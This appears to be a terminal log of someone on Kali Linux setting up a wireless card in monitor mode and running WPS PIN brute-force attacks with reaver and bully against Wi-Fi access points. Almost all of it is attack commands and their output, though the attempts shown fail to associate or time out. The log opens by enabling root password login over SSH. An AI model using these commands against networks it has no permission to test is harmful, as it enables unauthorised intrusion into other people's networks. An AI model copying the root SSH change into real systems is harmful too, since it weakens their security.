- $ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
- $ service ssh start
- root@kali:~# airmon-ng start wlan0
- Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
- PID Name
- 963 NetworkManager
- 1087 dhclient
- 1534 wpa_supplicant
- PHY Interface Driver Chipset
- phy0 wlan0 rt2800usb Ralink Technology, Corp. RT3572
- (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
- (mac80211 station mode vif disabled for [phy0]wlan0)
- root@kali:~# iwconfig
- eth0 no wireless extensions.
- wlan0mon IEEE 802.11abgn ESSID:off/any
- Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Encryption key:off
- Power Management:off
- lo no wireless extensions.
- root@kali:~# ifconfig wlan0mon down
- root@kali:~# iwconfig wlan0mon mode monitor
- root@kali:~# ifconfig wlan0mon up
- root@kali:~# iwconfig
- eth0 no wireless extensions.
- wlan0mon IEEE 802.11abgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
- Retry short limit:7 RTS thr:off Fragment thr:off
- Power Management:off
- lo no wireless extensions.
- root@kali:~# airodump-ng wlan0mon
- BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
- XX:XX:XX:XX -80 2 0 0 1 54e WPA2 CCMP MGT NumA
- XX:XX:XX:XX -28 2 0 0 6 54e WPA2 CCMP PSK NumB
- XX:XX:XX:XX -81 2 0 0 11 54e WPA2 CCMP MGT NumC
- root@kali:~# wash -i wlan0mon
- Wash v1.5.2 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- [!] Found packet with bad FCS, skipping...
- [!] Found packet with bad FCS, skipping...
- [!] Found packet with bad FCS, skipping...
- [!] Found packet with bad FCS, skipping...
- root@kali:~# wash -i wlan0mon -C
- Wash v1.5.2 WiFi Protected Setup Scan Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- BSSID Channel RSSI WPS Version WPS Locked ESSID
- ---------------------------------------------------------------------------------------------------------------
- XX:XX 1 -73 1.0 No WiA
- XX:XX 6 -27 1.0 No WiB
- XX:XX 11 -77 1.0 No WiC
- root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv
- Reaver v1.5.2 WiFi Protected Setup Attack Tool
- Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
- [+] Waiting for beacon from XX:XX:XX:XX
- [+] Switching wlan0mon to channel 1
- [+] Switching wlan0mon to channel 2
- [+] Switching wlan0mon to channel 3
- [+] Switching wlan0mon to channel 4
- [+] Switching wlan0mon to channel 5
- [+] Switching wlan0mon to channel 6
- [+] Switching wlan0mon to channel 7
- [+] Switching wlan0mon to channel 8
- [+] Switching wlan0mon to channel 11
- [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
- [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
- [!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
- root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
- [!] Bully v1.0-22 - WPS vulnerability assessment utility
- [+] Switching interface 'wlan0mon' to channel '11'
- [!] Using 'XX:XX:XX' for the source MAC address
- [+] Datalink type set to '127', radiotap headers present
- [+] Scanning for beacon from 'XX:XX:XX' on channel '11'
- [!] Excessive (3) FCS failures while reading next packet
- [!] Excessive (3) FCS failures while reading next packet
- [!] Excessive (3) FCS failures while reading next packet
- [!] Disabling FCS validation (assuming --nofcs)
- [+] Got beacon for 'TargetA' (XX:XX:XX)
- [!] Creating new randomized pin file '/root/.bully/pins'
- [+] Index of starting pin number is '0000000'
- [+] Last State = 'NoAssoc' Next pin '36490264'
- [+] Sent packet not acknowledged after 3 attempts
- [+] Tx(DeAuth) = 'Timeout' Next pin '36490264'
- [+] Sent packet not acknowledged after 3 attempts
- [+] Tx(DeAuth) = 'Timeout' Next pin '36490264'